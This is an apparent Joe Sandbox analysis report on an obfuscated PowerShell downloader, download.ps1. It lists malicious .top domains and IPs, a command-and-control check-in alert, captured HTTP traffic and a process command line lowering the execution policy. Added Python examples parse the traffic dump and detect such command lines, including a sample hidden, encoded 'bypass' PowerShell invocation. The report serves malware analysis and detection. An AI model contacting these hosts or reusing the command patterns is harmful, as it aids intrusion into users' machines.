download.ps1                  malicious  Unknown      gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/fm2yw8l13shtr.php?id=user-PC&key=91595968094&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527
download.ps1                  malicious  Unknown      gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
No context
Match: AS40676US
Associated Sample Name / URL  Detection  Threat Name  Context
loligang.arm.elf              malicious  Mirai        107.176.168.227
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
download.ps1                  malicious  Unknown      45.61.136.138
No context
No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulVmdtZ:NllUM
MD5: 013016A37665E1E37F0A3576A8EC8324
SHA1: 260F55EC88E3C4D384658F3C18C7FDEF202E47DD
SHA-256: 20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
SHA-512: 99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7336278769660507
Encrypted: false
SSDEEP: 48:lnE0l4oDLPr3C4U28HjgQukvhkvklCywKmd/YOKl1ZCSogZo5fYOKl1ZCSogZod1:Nz/D33CxHHykvhkvCCtpYOKVH2YOKVHm
MD5: 3E1EE8A24AAE6613C4FB84A039C97168
SHA1: BBADC63864C9E6E314FC874CB9672556CA5E1460
SHA-256: 53A0DD4F74AA4B1CC8356F528C6C1BC8EB99E69F3A380644E825052C16EC2BA2
SHA-512: BC7C7F32FA4AA3962D9C79789B3821473898BD92D61967A4FC97762BC8854D07DF1B141B3C45A1570B3D0E8E72E333B9CED0427AE9DFC6166906E3C47A1F03F4
Malicious: false
Preview: ...................................FL..................F.".. ...-/.v....Q..q.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....zG m.Z...z!q.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.y...........................%..A.p.p.D.a.t.a...B.V.1......Y.y..Roaming.@......CW.^.Y.y..........................-!..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................I...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.y....Q...........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6221
Entropy (8bit): 3.7336278769660507
Encrypted: false
SSDEEP: 48:lnE0l4oDLPr3C4U28HjgQukvhkvklCywKmd/YOKl1ZCSogZo5fYOKl1ZCSogZod1:Nz/D33CxHHykvhkvCCtpYOKVH2YOKVHm
MD5: 3E1EE8A24AAE6613C4FB84A039C97168
SHA1: BBADC63864C9E6E314FC874CB9672556CA5E1460
SHA-256: 53A0DD4F74AA4B1CC8356F528C6C1BC8EB99E69F3A380644E825052C16EC2BA2
SHA-512: BC7C7F32FA4AA3962D9C79789B3821473898BD92D61967A4FC97762BC8854D07DF1B141B3C45A1570B3D0E8E72E333B9CED0427AE9DFC6166906E3C47A1F03F4
Malicious: false
Preview: ...................................FL..................F.".. ...-/.v....Q..q.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....zG m.Z...z!q.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.y...........................%..A.p.p.D.a.t.a...B.V.1......Y.y..Roaming.@......CW.^.Y.y..........................-!..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................I...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.y....Q...........
File type: ASCII text, with very long lines (10932), with CRLF line terminators
Entropy (8bit): 6.0041352096486085
TrID:
File name: download.ps1
File size: 19'360 bytes
MD5: f6ab611e38035ef4886d5526e7b9a88a
SHA1: 8569435224c6c52737fb5114a073e62a1a32de21
SHA256: 1522bd349cec20303ee2c3bf624f52e02b179bc5fc597bec575f7d34c213b3e5
SHA512: 92a59ace7998d44c4a204455f82a62bbb85726d181e12448473d688a2ece465e4f820b5e74540578757405fe27b3f8e08dea3aac7ea0de22cb58666c84fe07ca
SSDEEP: 384:pi7M72+q1iA2oXL5SOJacjVBW+bR4S5yPFXaz3t0JVbGAhMTzV:piABYXlNBrJbR4S0XaDWVbGA69
TLSH: 6E925CF537C9ECA2C24EC57B6126BC083722B0FBD5F658C0B3B9996173592806E78D81
File Content Preview: $nbrvwfiquyj=$executioncontext;$inaltionoroninrereorbeononatatre = -join (0..54 | ForEach-Object {[char]([int]"000001150000011400000119000001120000011800000116000001180000011700000117000001120000011800000110000001110000011700000114000001180000011600000118
Icon Hash: 3270d6baae77db44
Timestamp                        SID      Signature                                              Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-12-30T16:14:02.027665+0100  1810000  Joe Security ANOMALY Windows PowerShell HTTP activity  1         192.168.2.4  49730        45.61.136.138    80         TCP
2024-12-30T16:14:02.027665+0100  2057741  ET MALWARE TA582 CnC Checkin                           1         192.168.2.4  49730        45.61.136.138    80         TCP
2024-12-30T16:14:02.666431+0100  1810000  Joe Security ANOMALY Windows PowerShell HTTP activity  1         192.168.2.4  49731        142.250.185.132  80         TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 16:14:00.619612932 CET | 64709 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 16:14:01.341732025 CET | 53 | 64709 | 1.1.1.1 | 192.168.2.4
Dec 30, 2024 16:14:01.976661921 CET | 63367 | 53 | 192.168.2.4 | 1.1.1.1
Dec 30, 2024 16:14:01.983480930 CET | 53 | 63367 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 16:14:00.619612932 CET | 192.168.2.4 | 1.1.1.1 | 0x90e9 | Standard query (0) | kdemjgebjimkanl.top | A (IP address) | IN (0x0001) | false
Dec 30, 2024 16:14:01.976661921 CET | 192.168.2.4 | 1.1.1.1 | 0xd44 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 16:14:01.341732025 CET | 1.1.1.1 | 192.168.2.4 | 0x90e9 | No error (0) | kdemjgebjimkanl.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 16:14:01.983480930 CET | 1.1.1.1 | 192.168.2.4 | 0xd44 | No error (0) | www.google.com | | 142.250.185.132 | A (IP address) | IN (0x0001) | false
• kdemjgebjimkanl.top
• www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | 2008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dec 30, 2024 16:14:01.363929987 CET, 216 bytes, OUT:
GET /du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: kdemjgebjimkanl.top
Connection: Keep-Alive

Dec 30, 2024 16:14:01.975390911 CET, 166 bytes, IN:
HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 30 Dec 2024 15:14:01 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.250.185.132 | 80 | 2008 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dec 30, 2024 16:14:01.990700006 CET, 159 bytes, OUT:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive

Dec 30, 2024 16:14:02.666331053 CET, 1236 bytes, IN:
HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 15:14:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-QRSgWh_fnsVpcixOprXVSA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UenYcFCWxbxcBOMXfId6FH7s6YhgsnRioM3SzV7_rNnD6C6bz8_g; expires=Sat, 28-Jun-2025 15:14:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=bdLl0HFSenvRo6h1LK6O3tFeWIESbLvMmK6MIcoEwKEHQlLRotj6yCp_a-yuumNhwZv8d-Dnip-FI169wjHl-jT--VfIPXYwQcOPdU2RjxcCeGTVkuXZmrC2poPeHafAa5VtUWizvnQ_WNGjtLalstT4ll_aAtxQIMdCp6VHzeE8YMsciAiHPRKT49AE1y7vsnvEWOxL; expires=Tue, 01-Jul-2025 15:14:02 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
                                                                                                            Dec 30, 2024 16:14:02.666476011 CET1236INData Raw: 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a 32 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65
                                                                                                            Data Ascii: hadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-
                                                                                                            Dec 30, 2024 16:14:02.666491985 CET704INData Raw: 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 67 62 74 73
                                                                                                            Data Ascii: lay:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:default}.gbts{border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*dis
                                                                                                            Dec 30, 2024 16:14:02.666508913 CET1236INData Raw: 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d
                                                                                                            Data Ascii: url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:no
                                                                                                            Dec 30, 2024 16:14:02.671355963 CET1236INData Raw: 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a
                                                                                                            Data Ascii: gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-
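The Data Raw / Data Ascii pairs above are the report's preview of the TCP stream carrying the HTTP/80 response from google.com that download.ps1 requested with a browser user agent. The following is an added example, not part of the Joe Sandbox report, that parses that dump format, checks each hex preview against the ASCII preview printed beside it, and counts how many bytes of each segment the report did not show. The two segments in SAMPLE are copied from the lines above; the regular expression for the header line is derived from the shape of those lines and is an assumption, as is reading IN as bytes received by the analysis machine (the Google response above is labelled IN).

```python
"""Parse the hex/ASCII TCP stream dump a Joe Sandbox report prints for a
network connection and reassemble the bytes it previews.

Added example, not part of the report. The two segments in SAMPLE are copied
from the report's dump of the HTTP/80 response from google.com; the header
regular expression is an assumption derived from the shape of those lines."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List

# Header line shape: "<timestamp> <tz><segment bytes><IN|OUT>Data Raw: <hex>"
_RAW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) "
    r"(?P<tz>[A-Z]+)(?P<length>\d+)(?P<direction>IN|OUT)Data Raw: ?(?P<hex>.*)$"
)
_ASCII_RE = re.compile(r"^Data Ascii: ?(?P<ascii>.*)$")

# Two IN segments copied verbatim from the report's dump of the Google response.
SAMPLE = """\
Dec 30, 2024 16:14:02.666384935 CET1236INData Raw: 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61 6e 64 61 72 64 5f 63 6f 6c 6f 72 5f 31 32 38 64 70 2e 70 6e 67 22 20 69 74 65 6d 70
Data Ascii: <meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var _g={kEI:'urhyZ9bzH7eJxc8Psc-pmAg',kEXPI:'0,3700256,693,435,538661,2872,28
Dec 30, 2024 16:14:02.666402102 CET224INData Raw: 2c 32 2c 32 32 2c 33 32 34 2c 36 33 33 2c 32 2c 37 32 37 2c 35 2c 39 31 35 2c 31 2c 36 33 31 2c 31 2c 35 34 2c 39 30 38 2c 35 34 31 2c 31 2c 31 30 38 2c 33 35 2c 32 32 2c 36 36 2c 33 31 34 2c 38 2c 32 33 33 2c 33 2c 31 31 2c 34 39 33 2c 31 32 39
Data Ascii: ,2,22,324,633,2,727,5,915,1,631,1,54,908,541,1,108,35,22,66,314,8,233,3,11,493,1298,80,178,58,259,152,361,430,2,7,1,274,489,110,232,179,680,61,32,39,71,603,243,476,78,361,55,1,132,305,340,488,74,146,209,36,50,243,2,1852,1,23
"""


@dataclass
class Segment:
    timestamp: datetime
    tz: str
    length: int         # full segment size stated by the report, in bytes
    direction: str      # "IN": received by the analysis VM, "OUT": sent by it
    raw: bytes          # decoded hex preview; the report truncates it
    ascii_preview: str  # the report's own ASCII rendering of the segment

    @property
    def preview_consistent(self) -> bool:
        """The hex preview should decode to a prefix of the ASCII preview."""
        return self.ascii_preview.startswith(self.raw.decode("latin-1"))


def _parse_ts(ts: str) -> datetime:
    # The report prints nanoseconds; strptime's %f accepts at most six digits.
    whole, frac = ts.split(".")
    return datetime.strptime(f"{whole}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_dump(text: str) -> List[Segment]:
    """Pair every 'Data Raw' line with the 'Data Ascii' line that follows it."""
    segments: List[Segment] = []
    pending = None
    for line in text.splitlines():
        line = line.strip()
        raw_match = _RAW_RE.match(line)
        if raw_match:
            pending = raw_match
            continue
        ascii_match = _ASCII_RE.match(line)
        if ascii_match and pending is not None:
            hex_text = pending.group("hex").strip()
            segments.append(Segment(
                timestamp=_parse_ts(pending.group("ts")),
                tz=pending.group("tz"),
                length=int(pending.group("length")),
                direction=pending.group("direction"),
                raw=bytes.fromhex(hex_text) if hex_text else b"",
                ascii_preview=ascii_match.group("ascii"),
            ))
            pending = None
    return segments


def reassemble(segments: List[Segment], direction: str = "IN") -> bytes:
    """Concatenate the previewed bytes of one direction in capture order."""
    ordered = sorted((s for s in segments if s.direction == direction),
                     key=lambda s: s.timestamp)
    return b"".join(s.raw for s in ordered)


def missing_preview_bytes(segments: List[Segment]) -> int:
    """Bytes the report did not show: stated segment size minus previewed bytes."""
    return sum(s.length - len(s.raw) for s in segments)


if __name__ == "__main__":
    segs = parse_dump(SAMPLE)
    for s in segs:
        print(s.timestamp.time(), s.direction, s.length, len(s.raw), s.preview_consistent)
    print(reassemble(segs)[:60])
    print(missing_preview_bytes(segs), "bytes of these segments are not in the report")
```

The check matters because the report previews only the first 82 bytes of each segment while stating sizes of 1236 and 224 bytes, so the stream cannot be fully reconstructed from the HTML report; pull the PCAP from the sandbox when the full response body is needed. The same parser works on the OUT segments, which is where the request line and the browser-style User-Agent header the report flags would be found.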


                                                                                                            Target ID:0
                                                                                                            Start time:10:13:54
                                                                                                            Start date:30/12/2024
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                            Imagebase:0x7ff788560000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:1
                                                                                                            Start time:10:13:54
                                                                                                            Start date:30/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true
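The powershell.exe entry above carries the command line behind the report's Sigma hit "Change PowerShell Policies to an Insecure Level": -ExecutionPolicy unrestricted combined with -file pointing at a script on the user's Desktop. Below is an added example, not code from the report or from Joe Sandbox, of a detection check over process-creation records that use the field names the report's Sigma output uses (Image, CommandLine, ProcessId). It runs the report's two real records (PIDs 2008 and 5460) together with two constructed ones for contrast; the set of abbreviated flags, the user-writable path markers and the constructed records are assumptions made for the example.

```python
"""Flag PowerShell process-creation records that lower the execution policy
and run a script from a user-writable location, the pattern behind the
report's Sigma hit "Change PowerShell Policies to an Insecure Level".

Added example, not part of the Joe Sandbox report. The first two records in
SAMPLE_EVENTS are the report's own process entries (PIDs 2008 and 5460); the
other two are constructed. Field names follow the report's Sigma output."""
import base64
import re
from typing import Dict, List

INSECURE_POLICIES = {"unrestricted", "bypass"}
# powershell.exe accepts unambiguous prefixes, so abbreviated flags count too
# (assumed set for this example).
POLICY_FLAGS = {"-executionpolicy", "-exec", "-ex", "-ep"}
FILE_FLAGS = {"-file", "-f"}
ENCODED_FLAGS = {"-encodedcommand", "-enc", "-ec", "-e"}
WINDOW_FLAGS = {"-windowstyle", "-w"}
# Path fragments an unprivileged user can write to (assumption; tune per estate).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

SAMPLE_EVENTS: List[Dict[str, object]] = [
    {  # the report's own process creation record
        "ProcessId": 2008,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"',
    },
    {  # the report's conhost child: not PowerShell, must not fire
        "ProcessId": 5460,
        "Image": r"C:\Windows\System32\conhost.exe",
        "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    },
    {  # constructed benign task: RemoteSigned, script under Program Files
        "ProcessId": 4100,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Program Files\Backup\nightly.ps1"',
    },
    {  # constructed: abbreviated flags, hidden window, encoded "IEX"
        "ProcessId": 4212,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA",
    },
]


def tokenize(cmd: str) -> List[str]:
    """Split a Windows command line, keeping double-quoted paths together."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in {"powershell.exe", "pwsh.exe"}


def decode_encoded_command(token: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(record: Dict[str, object]) -> List[str]:
    """Return the reasons this record is suspicious (empty list = nothing found)."""
    if not is_powershell(str(record["Image"])):
        return []
    toks = tokenize(str(record["CommandLine"]))
    low = [t.lower() for t in toks]
    reasons: List[str] = []
    for i, flag in enumerate(low):
        nxt = low[i + 1] if i + 1 < len(low) else ""
        if flag in POLICY_FLAGS and nxt in INSECURE_POLICIES:
            reasons.append(f"execution policy lowered to {toks[i + 1]}")
        elif flag in FILE_FLAGS and any(m in nxt for m in USER_WRITABLE):
            reasons.append(f"script run from user-writable path {toks[i + 1]}")
        elif flag in WINDOW_FLAGS and nxt == "hidden":
            reasons.append("window hidden from the user")
        elif flag in ENCODED_FLAGS and nxt:
            reasons.append(f"encoded command decodes to {decode_encoded_command(toks[i + 1])!r}")
    return reasons


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map each ProcessId to its list of reasons."""
    return {int(e["ProcessId"]): analyse(e) for e in events}


if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, reasons or "no finding")
```

Lowering the execution policy is not a security boundary being crossed, so it is weak evidence on its own; the record becomes worth an alert when it is paired with a script path under a user profile, as in the report's command line, or with a hidden window and an encoded command. Telemetry that only records the image name and not the full command line cannot support this check, so confirm the source (Sysmon Event ID 1, Security 4688 with command-line auditing enabled) before deploying it.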

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 651476c922c9f0be976d68fcd91bf30f958328ced4270350fb6d17b1d430d04d
                                                                                                              • Instruction ID: e3c3c27561eb2cef66e6bc7b3ea33e7152b5e9e3e284d1649525898fa513be3b
                                                                                                              • Opcode Fuzzy Hash: 651476c922c9f0be976d68fcd91bf30f958328ced4270350fb6d17b1d430d04d
                                                                                                              • Instruction Fuzzy Hash: 28F1A630A09B8D8FEBA8DF28C8657E937E1FF54310F44426EE85DC76A5DB3499418B81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1780324210.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ffd9b790000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 91b655fb731296faa830d0581da863d987d572fc47539c3e6f93c68a232fdcfd
                                                                                                              • Instruction ID: b8c334069e5eae21dbc4feb3775193599aa64da542fbf38fe7fa1f4b214b4d41
                                                                                                              • Opcode Fuzzy Hash: 91b655fb731296faa830d0581da863d987d572fc47539c3e6f93c68a232fdcfd
                                                                                                              • Instruction Fuzzy Hash: 63E1B430A09A4E8FEFA8DF28C8697F937D1FF54310F14426AD84DC72A5DE78A9518781
